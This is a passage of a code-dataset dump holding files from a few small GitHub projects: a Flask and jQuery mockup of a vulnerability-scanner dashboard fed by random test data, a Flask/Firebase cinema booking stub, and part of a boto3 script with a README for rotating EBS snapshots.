backgroundColor: \"rgba(28,132,198,0.5)\"\n }]\n },\n options: {\n maintainAspectRatio: false,\n animation: {\n duration: 0\n },\n scales: {\n yAxes: [{\n ticks: {\n stepSize: 1,\n min: 0,\n suggestedMax: 4\n },\n scaleLabel: {\n labelString: 'Number of Issues',\n display: true\n }\n\n }]\n }\n }\n });\n }\n });\n });\n\n\n" }, { "alpha_fraction": 0.4815565347671509, "alphanum_fraction": 0.4980407953262329, "avg_line_length": 31.460525512695312, "blob_id": "912b17f206921fac719c8290baf47529d890aada", "content_id": "3eca8b9ff5a8f9b74879d6ab6161fc6df5f49b5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7401, "license_type": "no_license", "max_line_length": 163, "num_lines": 228, "path": "/functions.py", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "import peewee\n\nfrom models import *\n\nimport random\nimport collections\n\nnavigation_menu = [\n {\n \"link\": \"/dashboard\",\n \"icon\": \"fas fa-fw fa-tachometer-alt\",\n \"title\": \"Dashboard\"\n },\n {\n \"link\": \"/issues\",\n \"icon\": \"fas fa-fw fa-exclamation-triangle\",\n \"title\": \"Issues\"\n },\n {\n \"link\": \"/reports\",\n \"icon\": \"fas fa-fw fa-chart-area\",\n \"title\": \"Reports\"\n },\n {\n \"link\": \"/targets\",\n \"icon\": \"fas fa-fw fa-bullseye\",\n \"title\": \"Targets\"\n },\n {\n \"link\": \"/network\",\n \"icon\": \"fas fa-fw fa-laptop\",\n \"title\": \"Network\"\n }\n]\n\npage_titles = {\n \"/dashboard\": \"Dashboard\",\n \"/reports\": \"Reports\",\n \"/targets\": \"Targets\",\n \"/issues\": \"Issues\",\n \"/network\": \"Network\"\n}\n\ntypes = [\n {\n 'type': 'danger',\n 'title': 'Critical',\n 'color': '#e74a3b',\n 'order': 4\n },\n {\n 'type': 'primary',\n 'title': 'Low',\n 'color': '#4e73df',\n 'order': 2\n },\n {\n 'type': 'warning',\n 'title': 'High',\n 'color': '#f6c23e',\n 'order': 3\n },\n {\n 'type': 'info',\n 'title': 'Medium',\n 'color': '#36b9cc',\n 'order': 1\n }\n ]\n\nissues = [\n {\n 'type': 'info',\n 'title': 'Reflected Cross-Site Scripting (XSS)',\n 'issue_id': 123\n },\n {\n 'type': 'primary',\n 'title': 'Web Server In Use Contains Known Vulnerabilities (Apache)',\n 'issue_id': 234\n },\n {\n 'type': 'danger',\n 'title': 'Web Server Directory Listings Expose List of Files',\n 'issue_id': 345\n }\n]\n#\n# def create_database():\n# try:\n# pg_db.drop_tables([\n# Issue_category\n# ]\n# )\n# print('Dropped.')\n# except peewee.InternalError as err:\n# print(err)\n# try:\n# pg_db.create_tables([\n# Issue_category\n# ])\n# print('Created.')\n# except peewee.InternalError as err:\n# print(err)\n\n\ndef test_network_data():\n res = {}\n protocols = ['tcp','ftp','sftp','ip','ssl','ssh','http','https']\n services = ['Ubuntu 13', 'Windows XP', 'MacOS', 'Android']\n result_arr = []\n for i in range(1,11):\n tmp_arr = {}\n tmp_arr['ip_address'] = str(random.randint(1,255)) + '.' + str(random.randint(1,255)) + '.' + str(random.randint(1,255)) + '.' + str(random.randint(1,255))\n tmp_arr['hostnames'] = ''.join(random.choice(['hello', 'apple', 'something', 'yeah', 'nope', 'lalala']) for _ in range(5))\n tmp_arr['port'] = random.randint(1,9999)\n tmp_arr['protocol'] = random.choice(protocols)\n tmp_arr['service'] = random.choice(protocols)\n tmp_arr['service_info'] = random.choice(services)\n result_arr.append(tmp_arr)\n res['recordsTotal'] = len(result_arr)\n res['recordsFiltered'] = len(result_arr)\n res['data'] = result_arr\n print(res)\n return res\n\n\ndef test_targets_data():\n hostnames = ['test','main','index','preview','custom']\n zones = ['ru','com','net','org']\n result_arr = []\n for i in range(1,6):\n tmp_arr = {}\n tmp_arr['target_id'] = random.randint(1,9999)\n tmp_arr['hostname'] = random.choice(hostnames) + '.' + random.choice(hostnames) + '.' + random.choice(zones)\n tmp_arr['low_issues'] = random.randint(0,9)\n tmp_arr['medium_issues'] = random.randint(0,9)\n tmp_arr['high_issues'] = random.randint(0,9)\n tmp_arr['critical_issues'] = random.randint(0,9)\n result_arr.append(tmp_arr)\n return result_arr\n\ndef test_report_data():\n months = ['jan','feb','mar','apr','may','jun','jul','aug','sep','oct','nov','dec']\n result_arr = {\n 'months': [],\n 'critical_data': [],\n 'high_data': [],\n 'medium_data': [],\n 'low_data': []\n }\n columns = range(1,random.randint(1,20))\n for i in columns:\n result_arr['months'].append(str(random.randint(1,30)) + ' ' + random.choice(months))\n result_arr['critical_data'].append(random.randint(1,10))\n result_arr['high_data'].append(random.randint(1,10))\n result_arr['medium_data'].append(random.randint(1,10))\n result_arr['low_data'].append(random.randint(1,10))\n return result_arr\n\ndef test_dashboard_first():\n return random.choice(types)\n\ndef test_issues_list(filter=None):\n result_arr = []\n tmp_arr = {}\n hostnames = ['test', 'main', 'index', 'preview', 'custom']\n for i in range(1,10):\n tmp_arr = {}\n tmp_type = random.choice(types)\n tmp_arr['id'] = i\n tmp_arr['type'] = tmp_type['title']\n tmp_arr['bg'] = tmp_type['type']\n tmp_arr['order'] = tmp_type['order']\n tmp_arr['issue_title'] = ''.join(random.choice(['hello', 'apple', 'something', 'yeah', 'nope', 'lalala']) for _ in range(5))\n tmp_arr['description'] = 'Description of Issue'\n tmp_arr['links'] = [\n 'https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)',\n 'https://en.wikipedia.org/wiki/Cross-site_scripting'\n ]\n tmp_arr['recomendation'] = 'Some test'\n tmp_arr['occurences'] = []\n for p in range (1, 10):\n tmp_arr['occurences'].append(\n {\n 'target': tmp_arr['issue_title'],\n 'port': random.randint(1,9999),\n 'version': str(random.randint(0,5)) + '.' + str(random.randint(1,10)) + '.' + str(random.randint(1,50)),\n 'path': '/' + random.choice(hostnames),\n 'affcted_parameter': ''.join(random.choice(['a', 'b', 'c', 'd', 'e', 'f']) for _ in range(1)),\n 'age': str(random.randint(1,10)) + ' days',\n 'scanner_output': ' View ',\n 'other': '<div class=\"pull-right dropdown text-default\"><button data-toggle=\"dropdown\" type=\"button\" '\n 'aria-expanded=\"false\" aria-haspopup=\"true\" class=\"btn btn-white dropdown-toggle\"><i '\n 'class=\"fas fa-ellipsis-h\"></i></button> <ul aria-labelledby=\"dropdown-' + str(random.randint(1,99999)) + '\" '\n 'class=\"dropdown-menu\"><li class=\"dropdown-header\">Snooze by ...</li> <li><a href=\"#\" '\n 'title=\"\" class=\"snooze-issue\">accepting risk</a></li> <li><a href=\"#\" title=\"\" '\n 'class=\"snooze-issue\">marking as false positive</a></li> <li><a href=\"#\" title=\"\" '\n 'class=\"snooze-issue\">adding mitigating controls</a></li></ul></div> '\n }\n )\n if filter is not None:\n if (tmp_arr['type']).lower() == filter:\n result_arr.append(tmp_arr)\n else:\n result_arr.append(tmp_arr)\n\n\n return sorted(result_arr, key=lambda k: k['order'], reverse=True)\n\ndef get_cnt_group_issues(arr):\n types_issues = ['Low', 'Medium', 'High','Critical']\n result = {\n \"Low\" : 0,\n \"Medium\": 0,\n \"High\": 0,\n \"Critical\": 0\n }\n cnt = 0\n for t in types_issues:\n for i in arr:\n if i['type'] == t:\n result[t] += 1\n return result\n\n\ndef get_top_issues():\n return issues\n" }, { "alpha_fraction": 0.3909910023212433, "alphanum_fraction": 0.3909910023212433, "avg_line_length": 25.428571701049805, "blob_id": "dae2c01413178c8c52f336eb6d44bb366dd21a8e", "content_id": "8034c486ba63be239c0486aae7c533f35eb5dfee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 555, "license_type": "no_license", "max_line_length": 42, "num_lines": 21, "path": "/static/js/network.js", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "// Call the dataTables jQuery plugin\n$(document).ready(function() {\n\n $('#dataTable').DataTable({\n \"processing\": true,\n \"serverSide\": true,\n ajax: {\n url: '/data_source',\n type: 'POST'\n },\n \"lengthChange\": false,\n \"columns\": [\n { \"data\": \"ip_address\" },\n { \"data\": \"hostnames\" },\n { \"data\": \"port\" },\n { \"data\": \"protocol\" },\n { \"data\": \"service\" },\n { \"data\": \"service_info\" }\n ]\n });\n});\n" }, { "alpha_fraction": 0.6860648989677429, "alphanum_fraction": 0.6908155083656311, "avg_line_length": 36.117645263671875, "blob_id": "f7a525ddb0d13d06858a1c7c53a9c4fb92783e9d", "content_id": "25e8bbd4c8ae4cc69186f629fe0d5a34b1b9b305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2526, "license_type": "no_license", "max_line_length": 176, "num_lines": 68, "path": "/main.py", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "import sys\nfrom flask import Flask, url_for, request, render_template\nfrom functions import *\n\napp = Flask(__name__)\n\[email protected]('/')\[email protected]('/index')\[email protected]('/dashboard')\ndef index():\n return render_template('dashboard.html', nav_menu=navigation_menu, page_title=page_titles[\"/dashboard\"], first_card=test_dashboard_first(), issues=get_top_issues())\n\[email protected]('/issues', methods=['GET'])\ndef issues():\n issues_list = test_issues_list()\n return render_template('issues.html', nav_menu=navigation_menu, page_title=page_titles[\"/issues\"], issues_list=issues_list, group_issues=get_cnt_group_issues(issues_list))\n\[email protected]('/issues/<filter>', methods=['GET'])\ndef issues_filter(filter):\n issues_list = test_issues_list(filter)\n return render_template('issues.html', nav_menu=navigation_menu, page_title=page_titles[\"/issues\"], issues_list=issues_list, group_issues=get_cnt_group_issues(issues_list))\n\[email protected]('/issues/<int:type>', methods=['GET'])\ndef issues_type(type):\n issues_list = test_issues_list()\n return render_template('issues.html', nav_menu=navigation_menu, page_title=page_titles[\"/issues\"],\n issues_list=issues_list, group_issues=get_cnt_group_issues(issues_list))\n\n\[email protected]('/network', methods=['GET'])\ndef network():\n return render_template('network.html', nav_menu=navigation_menu, page_title=page_titles[\"/network\"])\n\[email protected]('/reports', methods=['GET'])\ndef reports():\n return render_template('reports.html', nav_menu=navigation_menu, page_title=page_titles[\"/reports\"])\n\[email protected]('/targets', methods=['GET'])\ndef targets():\n return render_template('targets.html', nav_menu=navigation_menu, page_title=page_titles[\"/targets\"], items=test_targets_data())\n\[email protected](404)\ndef not_found(error):\n return render_template('404.html', nav_menu=navigation_menu, page_title=\"404 - Page not found\"), 404\n\n\[email protected]('/create_database', methods=['GET', 'POST'])\ndef create_database():\n return create_database()\n\[email protected]('/data_source', methods=['POST'])\ndef test_dt():\n return test_network_data()\n\[email protected]('/delete_target', methods=['POST'])\ndef delete_target():\n return request.form['target_id'] # function to delete target\n\[email protected]('/scan_target', methods=['POST'])\ndef scan_target():\n return request.form['target_id'] # function to scan target\n\[email protected]('/get_report_data', methods=['POST'])\ndef get_report_data():\n return test_report_data()\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n" }, { "alpha_fraction": 0.6303030252456665, "alphanum_fraction": 0.6412121057510376, "avg_line_length": 24.030303955078125, "blob_id": "337e9a157213e9cd0222118d7aac39af53339902", "content_id": "9259ae4864de551b25d4162ee157568b591fc22e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 825, "license_type": "no_license", "max_line_length": 80, "num_lines": 33, "path": "/models.py", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "from peewee import *\nimport datetime\n\n\ndb_user = ''\ndb_password = ''\ndb_name = ''\ndb_host = 'localhost'\ndb_port = '5432'\n\npg_db = PostgresqlDatabase(db_name, user=db_user, password=db_password,\n host=db_host, port=db_port)\nnow = datetime.datetime.now()\n\nclass BaseModel(Model):\n class Meta:\n database = pg_db\n\n#\n# class Issue_category(BaseModel):\n# id = PrimaryKeyField(null=False, primary_key=True)\n# title = CharField(max_length=500, null=False)\n# color = CharField(max_length=50, null=False)\n#\n# created_at = DateTimeField(constraints=[SQL('DEFAULT CURRENT_TIMESTAMP')])\n# updated_at = DateTimeField(constraints=[SQL('DEFAULT CURRENT_TIMESTAMP')])\n#\n# class Meta:\n# db_table = 'Issue_category'\n# order_by = 'id', 'created_at'\n\n\n# Users in progress" }, { "alpha_fraction": 0.4982112944126129, "alphanum_fraction": 0.5001192688941956, "avg_line_length": 41.3636360168457, "blob_id": "e811efb0c548718f600e22d562334147cdeef36a", "content_id": "cda67904f0a34877d91b4ea451ba41c91a7c98ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4491, "license_type": "no_license", "max_line_length": 159, "num_lines": 99, "path": "/static/js/targets.js", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "$(document).ready(function () {\n\n // Поиск по таблице\n // Ищет по всем полям таблицы (даже цифры)\n $(\"#SearchTarget\").keyup(function() {\n _this = this;\n $.each($(\".table-targets tbody tr\"), function () {\n if ($(this).text().toLowerCase().indexOf($(_this).val().toLowerCase()) === -1) {\n $(this).hide();\n } else {\n $(this).show();\n }\n });\n });\n\n // При нажатии на сканирование выбранных\n $('span[data-original-title=\"Scan Targets\"]').click(function () {\n // Обходим все отмеченные хосты\n $('.cbx:checked').each(function () {\n // Запускаем сканирование на всех выбранных\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('button').removeClass('btn-info');\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('button').addClass('btn-danger');\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('button').children('i').removeClass('fa-play');\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('button').children('i').addClass('fa-stop');\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('span').html('Scanning ...');\n $.ajax({\n url: '/scan_target',\n type: 'post',\n data: {'target_id': $(this).data('id')},\n success: function (resp) {\n console.log(resp);\n }\n });\n });\n });\n\n // При выделении всех хостов\n $('span[data-original-title=\"Select All\"]').click(function () {\n $('.cbx').prop(\"checked\",true);\n cnt_cbx = cnt_cbx = $('.cbx').length;\n // Разблокируем кнопку\n $('span[data-original-title=\"Scan Targets\"] > a, span[data-original-title=\"Delete\"] > a').removeClass('disabled');\n });\n\n var cnt_cbx = 0;\n // Считаем количество отмеченных и блокируем/разблокируем кнопку\n $(function () {\n cnt_cbx = $('.cbx:checked').length;\n $('.cbx').bind('click' , function(e, a) {\n if (this.checked) {\n cnt_cbx += a ? -1 : 1;\n } else {\n cnt_cbx += a ? 1 : -1;\n }\n if(cnt_cbx > 0) {\n $('span[data-original-title=\"Scan Targets\"] > a, span[data-original-title=\"Delete\"] > a').removeClass('disabled');\n } else {\n $('span[data-original-title=\"Scan Targets\"] > a, span[data-original-title=\"Delete\"] > a').addClass('disabled');\n }\n });\n });\n var deleted_target_id = 0;\n // Если нажато удаление выбранных\n $('span[data-original-title=\"Delete\"]').click(function () {\n $('.cbx:checked').each(function () {\n $.ajax({\n url: '/delete_target',\n type: 'post',\n data: {'target_id': $(this).data('id')},\n success: function (resp) {\n console.log(resp);\n $('input[data-id=\"' + resp + '\"]').parents('td').parent('tr').remove();\n }\n });\n\n });\n });\n\n // При нажатии на сканирование напротив хоста\n $('.scan_target').click(function () {\n $(this).children('a').children('button').removeClass('btn-info');\n $(this).children('a').children('button').addClass('btn-danger');\n $(this).children('a').children('button').children('i').removeClass('fa-play');\n $(this).children('a').children('button').children('i').addClass('fa-stop');\n $(this).children('a').children('span').html('Scanning ...');\n $.ajax({\n url: '/scan_target',\n type: 'post',\n data: {'target_id': $(this).data('id')},\n success: function (resp) {\n console.log(resp);\n }\n });\n });\n $('.show_modal').click(function () {\n $('#target-new-modal').modal('show');\n $('#target-new-modal').css('display', 'block');\n })\n});" } ]
6
Abhinavjha07/Sentiment-Analysis
https://github.com/Abhinavjha07/Sentiment-Analysis
f1a2e2d4af75b5c74d14bf7d366d5bfc7987bef9
22af7d737f7607a8df6ee570e3eee2131df3d948
4eba53d3ed54537fcbc66d257683c398c2181281
refs/heads/master
2020-04-17T09:40:45.003364
2019-01-18T20:33:04
2019-01-18T20:33:04
166,468,468
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6940647959709167, "alphanum_fraction": 0.7131979465484619, "avg_line_length": 35.319149017333984, "blob_id": "74c5f0e1a14342ce10cfc60f958c93173f289a84", "content_id": "4f4651d2a083725bae917ee7e9b97d9302336406", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5122, "license_type": "no_license", "max_line_length": 138, "num_lines": 141, "path": "/Sentiment Analysis.py", "repo_name": "Abhinavjha07/Sentiment-Analysis", "src_encoding": "UTF-8", "text": "import nltk\nimport random\nimport pickle\nfrom nltk.corpus import movie_reviews\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom sklearn.naive_bayes import MultinomialNB,GaussianNB,BernoulliNB\nfrom sklearn.linear_model import LogisticRegression,SGDClassifier\nfrom sklearn.svm import SVC,LinearSVC,NuSVC\nfrom nltk.classify import ClassifierI\nfrom statistics import mode\nfrom nltk.tokenize import word_tokenize\n\nclass VoteClassifier(ClassifierI):\n def __init__(self,*classifiers):\n self._classifiers = classifiers\n\n def classify(self,features):\n votes = []\n\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n return mode(votes)\n\n def confidence(self,features):\n votes = []\n\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n\n choice_votes = votes.count(mode(votes))\n conf = choice_votes / len(votes)\n return conf\n \n\nshort_pos = open(\"positive.txt\",\"r\").read()\nshort_neg = open(\"negative.txt\",\"r\").read()\n\ndocuments =[]\n\nfor r in short_pos.split('\\n'):\n documents.append((r,\"pos\"))\n\nfor r in short_neg.split('\\n'):\n documents.append((r,\"neg\"))\n\nall_words = []\n\nshort_pos_words = word_tokenize(short_pos)\nshort_neg_words = word_tokenize(short_neg)\n\nfor w in short_pos_words:\n all_words.append(w.lower())\n\nfor w in short_neg_words:\n all_words.append(w.lower())\n \nall_words = nltk.FreqDist(all_words)\n#print(all_words.most_common(15))\n\nword_features = list(all_words.keys())[:5000]\n\ndef find_features(document):\n words = word_tokenize(document)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n\n return features\n\n#print((find_features(movie_reviews.words('neg/cv000_29416.txt'))))\nfeaturesets = [(find_features(rev),category)\n for (rev,category) in documents]\n\nrandom.shuffle(featuresets)\n\ntraining_set = featuresets[:10000]\ntesting_set = featuresets[10000:]\n\nclassifier = nltk.NaiveBayesClassifier.train(training_set)\nprint(\"Naive Bayes Algorithm accuracy : \",(nltk.classify.accuracy(classifier,testing_set))*100)\n\nclassifier.show_most_informative_features(20)\n\nMNB_classifier = SklearnClassifier(MultinomialNB())\nMNB_classifier.train(training_set)\nprint(\"MNB Algorithm accuracy : \",(nltk.classify.accuracy(MNB_classifier,testing_set))*100)\n\n\nBernoulliNB_classifier = SklearnClassifier(BernoulliNB())\nBernoulliNB_classifier.train(training_set)\nprint(\"BernoulliNB Algorithm accuracy : \",(nltk.classify.accuracy(BernoulliNB_classifier,testing_set))*100)\n##LogisticRegression,SGDClassifier\n\nLogisticRegression_classifier = SklearnClassifier(LogisticRegression())\nLogisticRegression_classifier.train(training_set)\nprint(\"LogisticRegression Algorithm accuracy : \",(nltk.classify.accuracy(LogisticRegression_classifier,testing_set))*100)\n\n##SGDClassifier_classifier = SklearnClassifier(SGDClassifier())\n##SGDClassifier_classifier.train(training_set)\n##print(\"SGDClassifier Algorithm accuracy : \",(nltk.classify.accuracy(SGDClassifier_classifier,testing_set))*100)\n\n\n\n\n##SVC,LinearSVC,NuSVC\nSVC_classifier = SklearnClassifier(SVC())\nSVC_classifier.train(training_set)\nprint(\"SVC Algorithm accuracy : \",(nltk.classify.accuracy(SVC_classifier,testing_set))*100)\n\nLinearSVC_classifier = SklearnClassifier(LinearSVC())\nLinearSVC_classifier.train(training_set)\nprint(\"LinearSVC Algorithm accuracy : \",(nltk.classify.accuracy(LinearSVC_classifier,testing_set))*100)\n\nNuSVC_classifier = SklearnClassifier(NuSVC())\nNuSVC_classifier.train(training_set)\nprint(\"NuSVC Algorithm accuracy : \",(nltk.classify.accuracy(NuSVC_classifier,testing_set))*100)\n\n\nvoted_classifier = VoteClassifier(classifier,\n LinearSVC_classifier,\n NuSVC_classifier,\n SVC_classifier,\n LogisticRegression_classifier,\n MNB_classifier,\n BernoulliNB_classifier)\n\nprint(\"Voted Classifier accuracy : \",(nltk.classify.accuracy(voted_classifier,testing_set))*100)\n\nprint(\"Classification : \",voted_classifier.classify(testing_set[0][0]),\"Confidence : \",voted_classifier.confidence(testing_set[0][0])*100)\nprint(\"Actual classification Result : \",testing[0][1])\n\nprint(\"Classification : \",voted_classifier.classify(testing_set[1][0]),\"Confidence : \",voted_classifier.confidence(testing_set[1][0])*100)\nprint(\"Actual classification Result : \",testing[1][1])\nprint(\"Classification : \",voted_classifier.classify(testing_set[2][0]),\"Confidence : \",voted_classifier.confidence(testing_set[2][0])*100)\nprint(\"Actual classification Result : \",testing[2][1])\nprint(\"Classification : \",voted_classifier.classify(testing_set[3][0]),\"Confidence : \",voted_classifier.confidence(testing_set[3][0])*100)\nprint(\"Actual classification Result : \",testing[3][1])\nprint(\"Classification : \",voted_classifier.classify(testing_set[4][0]),\"Confidence : \",voted_classifier.confidence(testing_set[4][0])*100)\nprint(\"Actual classification Result : \",testing[4][1])\n\n" }, { "alpha_fraction": 0.78515625, "alphanum_fraction": 0.80078125, "avg_line_length": 84.33333587646484, "blob_id": "1c3c68ab409b52e8e909235043cc1f7cc6e37dc8", "content_id": "58e501319d09ac9a81b6037cee8a0cde33f2ec13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 256, "license_type": "no_license", "max_line_length": 171, "num_lines": 3, "path": "/README.md", "repo_name": "Abhinavjha07/Sentiment-Analysis", "src_encoding": "UTF-8", "text": "# Sentiment-Analysis\nAnalyzes the sentiment of text, either positive or negative. \nIn this, we use the scikit-classifiers to create a new classifier to classify the texts as positive or negative. We achieve around 76~80 % accuracy using the given dataset\n" } ]
2
Parasmani300/cinema-hall
https://github.com/Parasmani300/cinema-hall
439f7c07f544748091ede204ba020e70b699b0c3
d6e1caeddaf78cec1173dfc5309d6f2a65e49836
38acb3dcb4c6c961614b9bbf4865a1240edef679
refs/heads/master
2022-11-27T13:34:39.642753
2020-08-10T07:11:12
2020-08-10T07:11:12
286,402,229
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.613933265209198, "alphanum_fraction": 0.692307710647583, "avg_line_length": 23.571428298950195, "blob_id": "de8d7fb2cc5eb912b03094d5732e3505cbf15deb", "content_id": "37376879f6b9edef2ade4c13487eac61df425915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/application/__init__.py", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": "\nfrom flask import Flask\nfrom config import Config\nfrom pyrebase import pyrebase\napp = Flask(__name__)\n\napp.config.from_object(Config)\n\nfirebaseConfig = {\n 'apiKey': \"AIzaSyDf0dXPrdtkUNm21XaseVVBPEA_DXeGSUQ\",\n 'authDomain': \"demoapp-8bd99.firebaseapp.com\",\n 'databaseURL': \"https://demoapp-8bd99.firebaseio.com\",\n 'projectId': \"demoapp-8bd99\",\n 'storageBucket': \"demoapp-8bd99.appspot.com\",\n 'messagingSenderId': \"359623902890\",\n 'appId': \"1:359623902890:web:7b049e2908ccda97b6b2d3\",\n 'measurementId': \"G-ZJR8E2L75K\"\n }\n\nfirebase = pyrebase.initialize_app(firebaseConfig)\n\nauth = firebase.auth()\ndb = firebase.database()\n\nfrom application import routes\n\n\nif __name__ == \"__main__\":\n app.run()\n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5737704634666443, "avg_line_length": 19.5, "blob_id": "8cbf4b2106efb7d327735fd8b74ab1eb9251286f", "content_id": "c8b21512ad2a16ff1016ab31f9d33fec8e8bd89a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 25, "num_lines": 6, "path": "/application/check.py", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": "def lazy_range(upto):\n index = 0\n while index < upto:\n yield index\n index = index + 1\nlazy_range(1000)" }, { "alpha_fraction": 0.7292418479919434, "alphanum_fraction": 0.7292418479919434, "avg_line_length": 26.799999237060547, "blob_id": "0264221023650c5d07012cbe234d7ca09aefa9e0", "content_id": "1e306bbfc0b069bf6ca3d51acf2d7c721012a782", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 96, "num_lines": 10, "path": "/application/routes.py", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": "from application import app,db,auth\nfrom flask import Flask, render_template, request, json, Response,redirect,flash,url_for,session\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\[email protected]('/book')\ndef book():\n return render_template('index.html')" }, { "alpha_fraction": 0.4751552939414978, "alphanum_fraction": 0.6925466060638428, "avg_line_length": 15.947368621826172, "blob_id": "e77d5807807baa32693da532edcf2e9bd45d5695", "content_id": "f11a8c69ded7fb52eb452cac1e48957c33e5ad31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 322, "license_type": "no_license", "max_line_length": 30, "num_lines": 19, "path": "/requirements.txt", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": "appdirs==1.4.4\nattrs==19.3.0\nautopep8==1.5.3\nblack==19.10b0\nclick==7.1.2\nFlask==1.1.2\nFlask-WTF==0.14.3\nitsdangerous==1.1.0\nJinja2==2.11.2\nMarkupSafe==1.1.1\nmysql-connector-python==8.0.19\npathspec==0.8.0\npycodestyle==2.6.0\npython-dotenv==0.13.0\nregex==2020.6.8\ntoml==0.10.1\ntyped-ast==1.4.1\nWerkzeug==1.0.1\nWTForms==2.3.1\n" }, { "alpha_fraction": 0.7818182110786438, "alphanum_fraction": 0.800000011920929, "avg_line_length": 17.66666603088379, "blob_id": "2a877a710a9a7044a83624f33c4d9ff8abd607f7", "content_id": "d499e8d158efc2fb6e6eaed980f98de9044a9a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 55, "license_type": "no_license", "max_line_length": 21, "num_lines": 3, "path": "/.flaskenv", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": "FLASK_ENV=development\nFLASK_DEBUG=1\nFLASK_APP = main.py" } ]
5
dignajar/amazon-aws-scripts
https://github.com/dignajar/amazon-aws-scripts
c0066ce3c1b246b311dee189879adcb5e3d26faa
1ba62b6ffb31bb9af2e825585c9c8833294cd5b0
f7adfa9210ea66e4b253bbaad1ab853e0d76c4e4
refs/heads/master
2021-01-01T05:19:49.701079
2017-04-11T12:56:33
2017-04-11T12:56:33
59,707,021
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7416545748710632, "alphanum_fraction": 0.7634252309799194, "avg_line_length": 25.461538314819336, "blob_id": "6ad08a358374ef26432bd9e0658a3145bd3b7cf8", "content_id": "9e659f502f290a95b431cade6ef29f73bfb506db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 689, "license_type": "no_license", "max_line_length": 158, "num_lines": 26, "path": "/README.md", "repo_name": "dignajar/amazon-aws-scripts", "src_encoding": "UTF-8", "text": "# Amazon AWS scripts\n\nAll scripts uses the library boto3.\n\n## snapshot.py\nCreate and delete old snapshot.\nWhen execute the script this will be create an snapshot of a volumeID, on the description of the snapshot will appear expiration date.\n\n### Variables configuration\nEdit the variables inside the file.\n\n```\n# Volume ID for snapshot\nvolumenID = \"vol-XXXX\"\n\n# Username with permissions, credentials are in .aws/credentials\nusername = \"snapshot\"\n\n# Region name\nregion = \"us-east-1\"\n\n# Amount of snapshot\nsnapshotAmount = 2\n```\n\nFor example if you create a snapshot on 25 May 2016, the snapshot will expire on 27 May 2016, the variable `snapshotAmount` has the amount of expiration days.\n\n" }, { "alpha_fraction": 0.5100046396255493, "alphanum_fraction": 0.5183806419372559, "avg_line_length": 29.26760482788086, "blob_id": "e62bdd8a66a1c6cbe47c9ad0275eeb5d82ea6503", "content_id": "b3e920acb59f4e2993ef3544351e525febfa7705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2149, "license_type": "no_license", "max_line_length": 89, "num_lines": 71, "path": "/snapshot.py", "repo_name": "dignajar/amazon-aws-scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# EDIT\n# ------------------------------------------------------------------------------\n\n# Volume ID for snapshot\nvolumenID = \"vol-eb194f49\"\n\n# Username with permissions, credentials are in .aws/credentials\nusername = \"snapshot\"\n\n# Region name\nregion = \"us-east-1\"\n\n# Amount of snapshot/days\nsnapshotAmount = 2\n\n# Libraries\n# ------------------------------------------------------------------------------\nimport boto3\nimport json\nfrom datetime import datetime, timedelta\n\n# Today and tomorrow date\n# ------------------------------------------------------------------------------\ntodayDate = datetime.today()\ntomorrowDate = todayDate + timedelta(days=snapshotAmount)\n\n# Session\n# ------------------------------------------------------------------------------\nsession = boto3.Session(profile_name=username)\n\n# EC2 session\n# ------------------------------------------------------------------------------\nec2 = session.client(\"ec2\", region_name=region)\n\n# Create snapshot\n# ------------------------------------------------------------------------------\n\n# All snapshot has the description \"backup_delete_on:Tomorrow date\"\ndescription = \"backup_delete_on:\"+tomorrowDate.strftime(\"%Y-%m-%d\")\n\n# Launch create snapshot\nprint \"Creating snapshot...\"\nprint ec2.create_snapshot(VolumeId=volumenID, Description=description)\nprint \"\"\n\n# Delete old snapshots\n# ------------------------------------------------------------------------------\n\n# snapshot 